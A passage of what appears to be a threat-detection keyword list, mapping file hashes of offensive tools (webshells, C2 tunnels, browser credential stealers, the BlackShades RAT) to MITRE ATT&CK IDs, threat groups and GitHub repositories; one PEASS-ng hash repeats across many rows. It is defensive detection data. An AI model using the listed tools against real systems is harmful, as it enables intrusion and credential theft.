"*4aaaf489536ec7521629fda215dc34a1f69836a77d29d44d2dbdd6da4bc2c250*",".{0,1000}4aaaf489536ec7521629fda215dc34a1f69836a77d29d44d2dbdd6da4bc2c250.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","26064"
"*4aac42059bf3bbd0742633ba002b4f20de0881ee15397b79cb7aec0244904065*",".{0,1000}4aac42059bf3bbd0742633ba002b4f20de0881ee15397b79cb7aec0244904065.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26065"
"*4ab0e8086598b7691fd17afbfa4a1cd79b3a13a9001a791c15a9f30afd43d13e*",".{0,1000}4ab0e8086598b7691fd17afbfa4a1cd79b3a13a9001a791c15a9f30afd43d13e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26066"
"*4ab4e04a014333fd820edebcd24b0fa920390d312f951bcf3cc1a7733baecdb8*",".{0,1000}4ab4e04a014333fd820edebcd24b0fa920390d312f951bcf3cc1a7733baecdb8.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","26067"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26068"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26069"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26070"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26071"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26072"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26073"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26074"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26075"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26076"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26077"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26078"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26079"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26080"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26081"
"*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26082"
"*4abe9875f67c1fe6a007397189962a3d3b99a6251c601128936dfbd6709c193d*",".{0,1000}4abe9875f67c1fe6a007397189962a3d3b99a6251c601128936dfbd6709c193d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26083"
"*4acaf168b97204a65d3bb68658755a143837689a38bfa0d7705eee432e4cdcc4*",".{0,1000}4acaf168b97204a65d3bb68658755a143837689a38bfa0d7705eee432e4cdcc4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26086"
"*4ad3b9a888e8b5338f81b44637feb93f929d8314992fc9b9b6566def8a6c59f9*",".{0,1000}4ad3b9a888e8b5338f81b44637feb93f929d8314992fc9b9b6566def8a6c59f9.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","26091"
"*4ad964e61bd5f63da0f48dfdbf4252550a4a8f894bf3c0813b3eb0dab6ac73bf*",".{0,1000}4ad964e61bd5f63da0f48dfdbf4252550a4a8f894bf3c0813b3eb0dab6ac73bf.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26093"
"*4adc5ba3d41fb6fd485c85df8bc00fc578280294e5724f34b6d1fbb79d9d1e80*",".{0,1000}4adc5ba3d41fb6fd485c85df8bc00fc578280294e5724f34b6d1fbb79d9d1e80.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","26094"
"*4ae656fa671d794cdf9780b1dbf9c2a097f81f7c349f2e18fbb2535d495feefd*",".{0,1000}4ae656fa671d794cdf9780b1dbf9c2a097f81f7c349f2e18fbb2535d495feefd.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","26096"
"*4ae67074c52164526a351037946fd4deacd275b5fbdea7e49845e9f201ac151d*",".{0,1000}4ae67074c52164526a351037946fd4deacd275b5fbdea7e49845e9f201ac151d.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26097"
"*4aea1d1fd9ccaeb832026cadde29adfc5bc5a566e423b201747b101c8ca4281c*",".{0,1000}4aea1d1fd9ccaeb832026cadde29adfc5bc5a566e423b201747b101c8ca4281c.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","26099"
"*4aede7350521d2a3d0975833db870f94c50c8d46c28d8b14f930619e35b4b07e*",".{0,1000}4aede7350521d2a3d0975833db870f94c50c8d46c28d8b14f930619e35b4b07e.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","#filehash","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","26101"
"*4af84ffd1badb65ce92e7d89e711b055e363db8bb59d8de5592d1215c626317d*",".{0,1000}4af84ffd1badb65ce92e7d89e711b055e363db8bb59d8de5592d1215c626317d.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","26104"
"*4b0ff1bd0004ab3d3ec7fe99d489246671adf95aaaf8750cb413bb77acfbfc18*",".{0,1000}4b0ff1bd0004ab3d3ec7fe99d489246671adf95aaaf8750cb413bb77acfbfc18.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","26106"
"*4b10c2daee126f80f9c19d018cbbd7d2f06c05f737a16c38e9aff1bfb951b2f4*",".{0,1000}4b10c2daee126f80f9c19d018cbbd7d2f06c05f737a16c38e9aff1bfb951b2f4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26107"
"*4b1965fb28c50aff632bae51e2bfee153009797f2b576932076d3472f984ae66*",".{0,1000}4b1965fb28c50aff632bae51e2bfee153009797f2b576932076d3472f984ae66.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26108"
"*4b1b36706c5306f0084713e926888ffbe0fe9bfbf1b0bdfeef950b6dc531cb18*",".{0,1000}4b1b36706c5306f0084713e926888ffbe0fe9bfbf1b0bdfeef950b6dc531cb18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26110"
"*4b1f30bb50fd9df218259854bfd47b7b2b9e818bdb64909e0105f120a2ca0014*",".{0,1000}4b1f30bb50fd9df218259854bfd47b7b2b9e818bdb64909e0105f120a2ca0014.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26111"
"*4b23fd7b0179a37fe15bf38ea9ccb0202202d36dcaa882c58a66c1979d37e92c*",".{0,1000}4b23fd7b0179a37fe15bf38ea9ccb0202202d36dcaa882c58a66c1979d37e92c.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","0","#filehash","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","26114"
"*4b2554d8616a20ca49097ec116c63dee9f400d532318b62d05d91590ce34ee49*",".{0,1000}4b2554d8616a20ca49097ec116c63dee9f400d532318b62d05d91590ce34ee49.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26116"
"*4b25648a17919f5d25080b160d998f02ace0c1fd3aab334dfe8ea53612cca954*",".{0,1000}4b25648a17919f5d25080b160d998f02ace0c1fd3aab334dfe8ea53612cca954.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","26117"
"*4B2E3A60-9A8F-4F36-8692-14ED9887E7BE*",".{0,1000}4B2E3A60\-9A8F\-4F36\-8692\-14ED9887E7BE.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","#GUIDproject","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","26119"
"*4b3201cd6976efb471ed4b5f567d9574d0a61871e0aa13cda59b1b8a82852f03*",".{0,1000}4b3201cd6976efb471ed4b5f567d9574d0a61871e0aa13cda59b1b8a82852f03.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26120"
"*4B37C8BF-B1C1-4025-93C6-C3B501CBB152*",".{0,1000}4B37C8BF\-B1C1\-4025\-93C6\-C3B501CBB152.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#GUIDproject","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","26123"
"*4b4a532b9efe70d220a086a839b59bf80d00368d3f821fb7f81f92eeb9ba3edc*",".{0,1000}4b4a532b9efe70d220a086a839b59bf80d00368d3f821fb7f81f92eeb9ba3edc.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26124"
"*4b532e80f16904176fc50b312ca8114d8ece3ec594cb34a29d7e5e0d767dca59*",".{0,1000}4b532e80f16904176fc50b312ca8114d8ece3ec594cb34a29d7e5e0d767dca59.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26126"
"*4b56fdc12b0f2b0c1e1b5f2e4e5fceb6794d4446587fbee895847d2eae8de930*",".{0,1000}4b56fdc12b0f2b0c1e1b5f2e4e5fceb6794d4446587fbee895847d2eae8de930.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","26127"
"*4b591b30acc45d581d7500bd107dea8155d325d3d8147d9cd4bd6c6aa3db7a98*",".{0,1000}4b591b30acc45d581d7500bd107dea8155d325d3d8147d9cd4bd6c6aa3db7a98.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","26128"
"*4b611d6813e8cc17dbc5d7ad3359e3f8aa65fee383e6423b846a26dad0f03ad2*",".{0,1000}4b611d6813e8cc17dbc5d7ad3359e3f8aa65fee383e6423b846a26dad0f03ad2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26129"
"*4b6c367f1ff92fcd77e8708461c2dbe215a6c44e167089efd8afeee24ecadece*",".{0,1000}4b6c367f1ff92fcd77e8708461c2dbe215a6c44e167089efd8afeee24ecadece.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26130"
"*4b6df010ff6834f9d493d178079730ebd03f3fefd7a1e8da6c4456f2ed8d6296*",".{0,1000}4b6df010ff6834f9d493d178079730ebd03f3fefd7a1e8da6c4456f2ed8d6296.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26131"
"*4b7a6d90bd88298bc472e3f092cb4d1f60b46f5530b0e4d3b85dd236cbd17b92*",".{0,1000}4b7a6d90bd88298bc472e3f092cb4d1f60b46f5530b0e4d3b85dd236cbd17b92.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","#filehash","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","26134"
